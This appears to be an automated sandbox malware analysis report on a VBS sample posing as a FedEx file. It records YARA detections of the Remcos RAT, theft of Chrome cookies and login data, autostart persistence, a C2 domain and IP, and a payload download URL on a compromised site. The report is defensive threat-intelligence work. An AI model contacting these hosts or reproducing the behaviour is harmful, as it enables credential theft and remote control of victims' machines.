Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_07584768 CreateNamedPipeW, 24_2_07584768

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000014.00000002.852534659.000000000364B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.852416599.000000000361C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 4636, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000014.00000002.852534659.000000000364B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.852416599.000000000361C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 4636, type: MEMORYSTR
Detected Remcos RAT
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Mutex created: \Sessions\1\BaseNamedObjects\Remcos_Mutex_Inj Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 557830 Sample: 775578748333_FEDEX.vbs Startdate: 21/01/2022 Architecture: WINDOWS Score: 100 54 www.wizumiya.co.jp 2->54 56 prda.aadg.msidentity.com 2->56 70 Multi AV Scanner detection for domain / URL 2->70 72 Found malware configuration 2->72 74 Multi AV Scanner detection for submitted file 2->74 76 7 other signatures 2->76 10 wscript.exe 2 2->10         started        13 cmd.exe 1 2->13         started        15 cmd.exe 1 2->15         started        signatures3 process4 signatures5 78 VBScript performs obfuscated calls to suspicious functions 10->78 80 Wscript starts Powershell (via cmd or directly) 10->80 82 Very long command line found 10->82 17 powershell.exe 22 10->17         started        84 Suspicious powershell command line found 13->84 86 Encrypted powershell cmdline option found 13->86 20 powershell.exe 10 13->20         started        22 conhost.exe 13->22         started        24 powershell.exe 10 15->24         started        26 conhost.exe 15->26         started        process6 signatures7 62 Suspicious powershell command line found 17->62 64 Very long command line found 17->64 66 Encrypted powershell cmdline option found 17->66 68 2 other signatures 17->68 28 ieinstal.exe 5 9 17->28         started        32 csc.exe 3 17->32         started        35 conhost.exe 17->35         started        37 powershell.exe 20->37         started        39 powershell.exe 24->39         started        process8 dnsIp9 58 rnnfibi.hopto.org 199.195.253.181, 49757, 54666 PONYNETUS United States 28->58 60 www.wizumiya.co.jp 52.68.15.223, 443, 49756, 49758 AMAZON-02US United States 28->60 88 Detected Remcos RAT 28->88 90 Creates autostart registry keys with suspicious values (likely registry only malware) 28->90 92 Creates an autostart registry key pointing to binary in C:\Windows 28->92 94 4 other signatures 28->94 41 iexplore.exe 28->41         started        50 C:\Users\user\AppData\Local\...\tm43worv.dll, PE32 32->50 dropped 43 cvtres.exe 1 32->43         started        45 csc.exe 37->45         started        file10 signatures11 process12 file13 52 C:\Users\user\AppData\Local\...\yy0zjl34.dll, PE32 45->52 dropped 48 cvtres.exe 45->48         started        process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
52.68.15.223
 www.wizumiya.co.jp United States
16509 AMAZON-02US false
199.195.253.181
 rnnfibi.hopto.org United States
53667 PONYNETUS true

Contacted Domains

Name IP Active
rnnfibi.hopto.org 199.195.253.181 true
www.wizumiya.co.jp 52.68.15.223 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
rnnfibi.hopto.org true
  • Avira URL Cloud: safe
 unknown
https://www.wizumiya.co.jp/html/user_data/original/images/Aso-new-WO-S_PAgZvxdaV59.bin false
  • Avira URL Cloud: safe
 unknown
https://www.wizumiya.co.jp/html/user_data/original/images/Ev true
  • Avira URL Cloud: safe
 unknown